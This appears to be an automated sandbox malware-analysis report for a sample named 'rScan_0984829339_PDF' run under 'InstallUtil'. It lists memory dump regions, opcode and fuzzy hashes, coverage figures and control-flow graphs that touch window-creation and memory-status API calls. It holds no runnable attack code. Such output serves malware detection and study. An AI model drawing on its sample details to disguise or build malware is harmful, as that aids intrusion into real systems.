                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1c8f40a5ae3f21643e41b88023eb6e660984462b6fb758db475024bff2c73547
                                                                          • Instruction ID: ec72f09e6991be3efaa3e0e9d0195bd25426099ffd81e56c07e6b91e20ec9790
                                                                          • Opcode Fuzzy Hash: 1c8f40a5ae3f21643e41b88023eb6e660984462b6fb758db475024bff2c73547
                                                                          • Instruction Fuzzy Hash: 0A01B132D2071ADFCB01CBA9DC854DDBBB2EFC6311F514611E10077150E7702549CBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2261471732.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_124d000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aea0e7de703562f4d50b0d7f2f7e297dc04eeee1edbf1ab883a7773826e3b3ba
                                                                          • Instruction ID: 8e00346ece7e08588a17043929bd6d20df08fa7049a9c763b61e5cf9d26ccd1d
                                                                          • Opcode Fuzzy Hash: aea0e7de703562f4d50b0d7f2f7e297dc04eeee1edbf1ab883a7773826e3b3ba
                                                                          • Instruction Fuzzy Hash: C6012B710183889BF71CCA69DD80B66FFD8EF51764F18C41AEF094A182C7B89844C671
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 69d62ae553f0c01386e753b6b388947986aa47486d2078e2bba78d7d82d5a590
                                                                          • Instruction ID: b999effc0bcdfdd52b7f31e565e8ba529233b3ea0efc7ace154d13d01eaef77d
                                                                          • Opcode Fuzzy Hash: 69d62ae553f0c01386e753b6b388947986aa47486d2078e2bba78d7d82d5a590
                                                                          • Instruction Fuzzy Hash: 53F0A471D10319DFDF14DB60C495AEFBBF5AF84310F01452AE402AB250DF70590A8B81
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2261471732.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_124d000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37bb3c4e424394028f51b6c9d855c530eeb2b7f55a7192072b6d37eb16ebe874
                                                                          • Instruction ID: 3b44d23166956a90b700b8487b0e3f67043eab6103046b66ba2f8fc441a00642
                                                                          • Opcode Fuzzy Hash: 37bb3c4e424394028f51b6c9d855c530eeb2b7f55a7192072b6d37eb16ebe874
                                                                          • Instruction Fuzzy Hash: 63E0EC34949308DBC708DB98E94567CBBB9EB45314F1091DD880917381D671AE42DB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 45e6de9a67ffab7b21a0385128e4f1f8b30320f7cd9fcc156d5d39d7fa0a11de
                                                                          • Instruction ID: e892a613ad0f112420dc83c8cb33b99b1e7882dfb2905c7870f018e7b4d6d73c
                                                                          • Opcode Fuzzy Hash: 45e6de9a67ffab7b21a0385128e4f1f8b30320f7cd9fcc156d5d39d7fa0a11de
                                                                          • Instruction Fuzzy Hash: 44E08C3090924C9BC750EBA4D84476CBFF8AB05210F5080E9C84853381D631AE42CB40
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 45e6de9a67ffab7b21a0385128e4f1f8b30320f7cd9fcc156d5d39d7fa0a11de
                                                                          • Instruction ID: fa1c94f6639d33c78bf828c6441de4d0286c824c392103615c16feac55080423
                                                                          • Opcode Fuzzy Hash: 45e6de9a67ffab7b21a0385128e4f1f8b30320f7cd9fcc156d5d39d7fa0a11de
                                                                          • Instruction Fuzzy Hash: FCE0C238808208DFC704DBA4D84837CFFB8EB85210F1080D9CC0853381D632AE46CB40
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 20f8483a21293280af14025554ba362ad29ee143a7d3b2af02c5517c2b5f0222
                                                                          • Instruction ID: 17651993b91f690dfbfd542703497fc3e66bbccc844f656a86af14f36325952b
                                                                          • Opcode Fuzzy Hash: 20f8483a21293280af14025554ba362ad29ee143a7d3b2af02c5517c2b5f0222
                                                                          • Instruction Fuzzy Hash: DED05E35949208DFC714CB94D948A68F7BCEB46204F50A0DD880953381DB72AE05CB40
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 52a03471db298d381d99de92cbda429e7bab63fb918239874a4cd20acace097d
                                                                          • Instruction ID: 4ed7d841e5709a98a329b8cf69aea1e3f4f04a592b613ce0877fcbdd01e01535
                                                                          • Opcode Fuzzy Hash: 52a03471db298d381d99de92cbda429e7bab63fb918239874a4cd20acace097d
                                                                          • Instruction Fuzzy Hash: B1D01770A1120DEB8B44EFA8E94455DBBB9EB44208B1091A9D80CE3211EA716E009B80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8a4bddb513f0a7cb62bc309a67a26bca6cec8b1244a26c3f18b0a61d596af9a3
                                                                          • Instruction ID: c71e9aeb60afc0facb7c285c5176880c9ccca3fe2d44e233d1ba211920e70f16
                                                                          • Opcode Fuzzy Hash: 8a4bddb513f0a7cb62bc309a67a26bca6cec8b1244a26c3f18b0a61d596af9a3
                                                                          • Instruction Fuzzy Hash: CEC02BB60BA34E93C3309A50788C3F437AC8F0B305F5224004B0C0002117F04490DB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 20c99389f841b4e963ffe19008cf242373ca3b27fe2601d2bf4c616531e61475
                                                                          • Instruction ID: a5d5babaaa7f38b0796d3a424ef070edc8a843ea7afb7fcdbf8a42a292038482
                                                                          • Opcode Fuzzy Hash: 20c99389f841b4e963ffe19008cf242373ca3b27fe2601d2bf4c616531e61475
                                                                          • Instruction Fuzzy Hash: 56C08C3204035842E350BBE86909368326D6B4031DF890105CA0C114008EB05080DB37
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                                          • Instruction ID: 38abe7dd1042be0fb53048ebea6c4231613550f466da05975beb372ee9a10ff0
                                                                          • Opcode Fuzzy Hash: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                                          • Instruction Fuzzy Hash: 17C29A6240E3C15FE7138B749DB6AE17FB5EE9321471E05DBC0C18B063E2A8594BD7A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 3
                                                                          • API String ID: 0-1842515611
                                                                          • Opcode ID: 4d527e3e6146c5cbd133b28d02027d1f52503f28bcf85eaaf48e5ed1788e6188
                                                                          • Instruction ID: f85151a74bff3698dd8678133e42c28ab2bd9701759759cbf16eac8ffc928a6f
                                                                          • Opcode Fuzzy Hash: 4d527e3e6146c5cbd133b28d02027d1f52503f28bcf85eaaf48e5ed1788e6188
                                                                          • Instruction Fuzzy Hash: F7311C71D047698BEB29CF268C54799FBF6AFC5300F04C1FAC448AA255E7710A868F11
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 3
                                                                          • API String ID: 0-1842515611
                                                                          • Opcode ID: 72b31215ea24da37c603acdb5f6709d8aae53809d4f0c763b6eb49da5471f05c
                                                                          • Instruction ID: 22b63db16ae17db95c6dc5724131cc91349dcf8b576de067afa21d88fad3dc78
                                                                          • Opcode Fuzzy Hash: 72b31215ea24da37c603acdb5f6709d8aae53809d4f0c763b6eb49da5471f05c
                                                                          • Instruction Fuzzy Hash: DB31CBB1D156298BEB28DF16C95879AFAF7BF89300F04C0EA980CA7255E7705A858F11
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c51f3204f7728c6863f912a35968c5a1849c7115ad2de4cef4e6309224363143
                                                                          • Instruction ID: 91f7fa70213ecb301244cb2b771719979b1b588086f902d9200675bce98aff9e
                                                                          • Opcode Fuzzy Hash: c51f3204f7728c6863f912a35968c5a1849c7115ad2de4cef4e6309224363143
                                                                          • Instruction Fuzzy Hash: F98117B0E24218CFDB64DFA9C8847EDBBB6EF4A340F1184A9C409A7241DBB55A85CF51
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3a6e3b2109ddf4057fabbcd718c5686caac721f8244e75941322b69e55d3ac76
                                                                          • Instruction ID: f600f5e931c567ee3b36e9ed1096887bd188f996522ffb9f0ee5ab93d552af61
                                                                          • Opcode Fuzzy Hash: 3a6e3b2109ddf4057fabbcd718c5686caac721f8244e75941322b69e55d3ac76
                                                                          • Instruction Fuzzy Hash: A6712CB1E00205CFDB5CEF6AE884699BBF2FBC8308F14D12AD14597329DB745849CB51
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86ac99122b8a67bcc4841abb418fc1ce091f990ea2213fef4ac7f1e8b4776837
                                                                          • Instruction ID: 64ca4193cfb402f0de0bb7ca5661a83f20093c842674241ac9e9747797df2bcb
                                                                          • Opcode Fuzzy Hash: 86ac99122b8a67bcc4841abb418fc1ce091f990ea2213fef4ac7f1e8b4776837
                                                                          • Instruction Fuzzy Hash: 2A712CB1E00209CFDB5CDF6AE884699BBF2FBC8308F14D12AD10997369EB755849CB51
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fc2b76edea634747b5fdc7ecf498e79a0bc1d88e589530bb6de88c5223b7a5d0
                                                                          • Instruction ID: 2bff0d3cba183c1ac7830c3ed8ef9c420b974561d14d5d2e3ba599573155b5ca
                                                                          • Opcode Fuzzy Hash: fc2b76edea634747b5fdc7ecf498e79a0bc1d88e589530bb6de88c5223b7a5d0
                                                                          • Instruction Fuzzy Hash: 9371A170D056288FEB68DF2ACD48799BBF6BF88305F10C1E9C50DA7664EB744A858F00

                                                                          Execution Graph

                                                                          Execution Coverage:8.7%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:38
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 40792 142d030 40793 142d048 40792->40793 40794 142d0a2 40793->40794 40797 66ba48c CallWindowProcW 40793->40797 40799 66bd6a8 40793->40799 40803 66bd697 40793->40803 40807 66be7f8 40793->40807 40797->40794 40800 66bd6ce 40799->40800 40801 66ba48c CallWindowProcW 40800->40801 40802 66bd6ef 40801->40802 40802->40794 40804 66bd6a5 40803->40804 40805 66ba48c CallWindowProcW 40804->40805 40806 66bd6ef 40805->40806 40806->40794 40808 66be808 40807->40808 40810 66be859 40808->40810 40811 66be46c CallWindowProcW 40808->40811 40811->40810 40768 66bfc00 40769 66bfc1c 40768->40769 40770 66bfd1c 40769->40770 40771 66bfc72 40769->40771 40775 66ba48c 40770->40775 40773 66bfcca CallWindowProcW 40771->40773 40774 66bfc79 40771->40774 40773->40774 40776 66ba497 40775->40776 40778 66be859 40776->40778 40779 66be46c CallWindowProcW 40776->40779 40779->40778 40812 66bd4f0 40813 66bd558 CreateWindowExW 40812->40813 40815 66bd614 40813->40815 40780 657dcf8 40781 657dd05 40780->40781 40782 657dd2d 40780->40782 40788 657d8e8 40782->40788 40784 657dd4e 40786 657de16 GlobalMemoryStatusEx 40787 657de46 40786->40787 40789 657ddd0 GlobalMemoryStatusEx 40788->40789 40791 657dd4a 40789->40791 40791->40784 40791->40786

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 695 657dcf8-657dd03 696 657dd05-657dd2c call 657d118 695->696 697 657dd2d-657dd4c call 657d8e8 695->697 703 657dd52-657ddb1 697->703 704 657dd4e-657dd51 697->704 711 657ddb7-657de44 GlobalMemoryStatusEx 703->711 712 657ddb3-657ddb6 703->712 715 657de46-657de4c 711->715 716 657de4d-657de75 711->716 715->716
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470395115.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_6570000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f94c6585753f2205566331759fef3d60cb7baf302a9133b4e5b28f619af5effa
                                                                          • Instruction ID: 68e10ff497e4bab522ac841964638e119039f34a1b386a1dc5e6149e94aefe45
                                                                          • Opcode Fuzzy Hash: f94c6585753f2205566331759fef3d60cb7baf302a9133b4e5b28f619af5effa
                                                                          • Instruction Fuzzy Hash: 9E410332D0439A9FCB14CF6AD8006EEBBF5BF89210F14866AE408E7350DB749845CBE0

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 719 66bd4e4-66bd556 721 66bd558-66bd55e 719->721 722 66bd561-66bd568 719->722 721->722 723 66bd56a-66bd570 722->723 724 66bd573-66bd5ab 722->724 723->724 725 66bd5b3-66bd612 CreateWindowExW 724->725 726 66bd61b-66bd653 725->726 727 66bd614-66bd61a 725->727 731 66bd660 726->731 732 66bd655-66bd658 726->732 727->726 733 66bd661 731->733 732->731 733->733
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066BD602
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470690468.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_66b0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 85b37b823743278430b52b7d8339fa35ee5833f11a8c87dafc2ef4beaab261f1
                                                                          • Instruction ID: 7cc9e8ea0ad0f413880b55b6f7ee84eb4c2ca3b0b4bf568f4081224b96f5c6df
                                                                          • Opcode Fuzzy Hash: 85b37b823743278430b52b7d8339fa35ee5833f11a8c87dafc2ef4beaab261f1
                                                                          • Instruction Fuzzy Hash: 2451C2B1D00349EFDF14CF9AC984ADEBBB5BF48314F24912AE819AB210D7759885CF90

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 734 66bd4f0-66bd556 735 66bd558-66bd55e 734->735 736 66bd561-66bd568 734->736 735->736 737 66bd56a-66bd570 736->737 738 66bd573-66bd612 CreateWindowExW 736->738 737->738 740 66bd61b-66bd653 738->740 741 66bd614-66bd61a 738->741 745 66bd660 740->745 746 66bd655-66bd658 740->746 741->740 747 66bd661 745->747 746->745 747->747
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066BD602
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470690468.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_66b0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 9b34bd6fcfcb796565175e2feb6a285fe328fd9f1c3b0a8d2996f259dc1a6f72
                                                                          • Instruction ID: 91c017352e4dd28d4bc5a553f64f079ba5e405b673d7dc62a5d56d30dcdf52c6
                                                                          • Opcode Fuzzy Hash: 9b34bd6fcfcb796565175e2feb6a285fe328fd9f1c3b0a8d2996f259dc1a6f72
                                                                          • Instruction Fuzzy Hash: 0941B1B1D00349EFDB14CF9AC884ADEBBB5BF48314F24912AE818AB210D7759885CF90

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 748 66be46c-66bfc6c 751 66bfd1c-66bfd3c call 66ba48c 748->751 752 66bfc72-66bfc77 748->752 759 66bfd3f-66bfd4c 751->759 754 66bfcca-66bfd02 CallWindowProcW 752->754 755 66bfc79-66bfcb0 752->755 756 66bfd0b-66bfd1a 754->756 757 66bfd04-66bfd0a 754->757 762 66bfcb9-66bfcc8 755->762 763 66bfcb2-66bfcb8 755->763 756->759 757->756 762->759 763->762
                                                                          APIs
                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 066BFCF1
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470690468.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_66b0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: CallProcWindow
                                                                          • String ID:
                                                                          • API String ID: 2714655100-0
                                                                          • Opcode ID: c52e8f9fe965be4b4ed49991389a8405ff4a6519ad43a753b9c1fbf7cea3ac8b
                                                                          • Instruction ID: 2fd74a3cbad3eb8426e998e03218584a4e01500654d55ce5d8ff98b27d00461b
                                                                          • Opcode Fuzzy Hash: c52e8f9fe965be4b4ed49991389a8405ff4a6519ad43a753b9c1fbf7cea3ac8b
                                                                          • Instruction Fuzzy Hash: D24118B5900309DFDB54CF99C888AAABBF5FF88314F24C859D519A7321D774A881CFA0

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 772 657ddc8-657de0e 773 657de16-657de44 GlobalMemoryStatusEx 772->773 774 657de46-657de4c 773->774 775 657de4d-657de75 773->775 774->775
                                                                          APIs
                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0657DD4A), ref: 0657DE37
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470395115.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_6570000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemoryStatus
                                                                          • String ID:
                                                                          • API String ID: 1890195054-0
                                                                          • Opcode ID: 08fe2f5826bae541cedc39fd83ca295d0de066d384503ac6521607da03458d19
                                                                          • Instruction ID: abd45254c3a1bc7f06e1414a6b39c60b506002781720b95480133262805904e1
                                                                          • Opcode Fuzzy Hash: 08fe2f5826bae541cedc39fd83ca295d0de066d384503ac6521607da03458d19
                                                                          • Instruction Fuzzy Hash: 041136B1C0065ADFCB10CF9AD844BDEFBB4BF48320F14821AE818A3240D778A941CFA1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 765 657d8e8-657de44 GlobalMemoryStatusEx 768 657de46-657de4c 765->768 769 657de4d-657de75 765->769 768->769
                                                                          APIs
                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0657DD4A), ref: 0657DE37
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2470395115.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_6570000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemoryStatus
                                                                          • String ID:
                                                                          • API String ID: 1890195054-0
                                                                          • Opcode ID: 8bec3c2e115766bdb447ba738cc8611ccf46d8cfff035d73691dbfb26f5cc1ce
                                                                          • Instruction ID: 0e5e4b6dfb90ee672fb711953e0ea046d005cd58e8f7a1f17080ab6096905007
                                                                          • Opcode Fuzzy Hash: 8bec3c2e115766bdb447ba738cc8611ccf46d8cfff035d73691dbfb26f5cc1ce
                                                                          • Instruction Fuzzy Hash: 3D1106B1C0065ADFDB10CF9AD4447AEFBF4BF48220F14866AE918B7240D778A954CFA5

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: U
                                                                          • API String ID: 0-3372436214
                                                                          • Opcode ID: bcf2dcad66a95c9bfd9f07ddfcc155f0773e744c832ebc299939ee2afec2ce58
                                                                          • Instruction ID: 9ec3884a1a75bc9ff3039d7a11cfe4d9646cc625769012d25010e45b43fb8375
                                                                          • Opcode Fuzzy Hash: bcf2dcad66a95c9bfd9f07ddfcc155f0773e744c832ebc299939ee2afec2ce58
                                                                          • Instruction Fuzzy Hash: 06219031E0065A8BDB19CF68D8546DEB7B2EF89324F10C66EEC15EB360EB709855CB50

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: edb22a8cc3a50abd125d526676c3bdf1a1b4877ddaaebbf2feebc4c48234c56b
                                                                          • Instruction ID: 4c9b63ff944920c9a0c5c33b967c6d966eddfe059ed73e7a107af22080f74b25
                                                                          • Opcode Fuzzy Hash: edb22a8cc3a50abd125d526676c3bdf1a1b4877ddaaebbf2feebc4c48234c56b
                                                                          • Instruction Fuzzy Hash: 9E12C171300106DBDB29AB3CE8986697BA2FBC5321B50497ED409CB37ADF75ED468780
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9b3c4d6652a771b5b7d920d93ed7dca982f74a69d67ff7cd6860260f6077d33f
                                                                          • Instruction ID: 6e903ed59b71156a848e05f16a76be33ddb2c455bd3c9f7d3ef462ee3ab5c1b6
                                                                          • Opcode Fuzzy Hash: 9b3c4d6652a771b5b7d920d93ed7dca982f74a69d67ff7cd6860260f6077d33f
                                                                          • Instruction Fuzzy Hash: A8510670D10618CFEB18CFA9C844BDEBBB2BF48314F15852AE815AB361D7749845CF90
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ebbd6c04fed7d5b744a5408a364d9a92df0dae1a741faf5d360aa7518fd74e6
                                                                          • Instruction ID: 5c122c0744369fdbca2905566493fcebb83c4a1775b238b35217a0e1a350558f
                                                                          • Opcode Fuzzy Hash: 5ebbd6c04fed7d5b744a5408a364d9a92df0dae1a741faf5d360aa7518fd74e6
                                                                          • Instruction Fuzzy Hash: 27511570D106188FEB18CFA9C884BDEBBB2BF48314F15851AE815AB361D774A885CF91
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_1470000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: da5532fcb702b29560ed961c019fe4bba8ed8f13fb60896717dd422dc928f7e8
                                                                          • Instruction ID: 0597923ae522163d1d799047c8b6000e53e749c27f865a0925532c7fd887a8e1
                                                                          • Opcode Fuzzy Hash: da5532fcb702b29560ed961c019fe4bba8ed8f13fb60896717dd422dc928f7e8
                                                                          • Instruction Fuzzy Hash: E131E0307012058FDB159B39D4946AF7BF2FF89650B24456ED402DB3A5EE31CC09CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2452571438.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
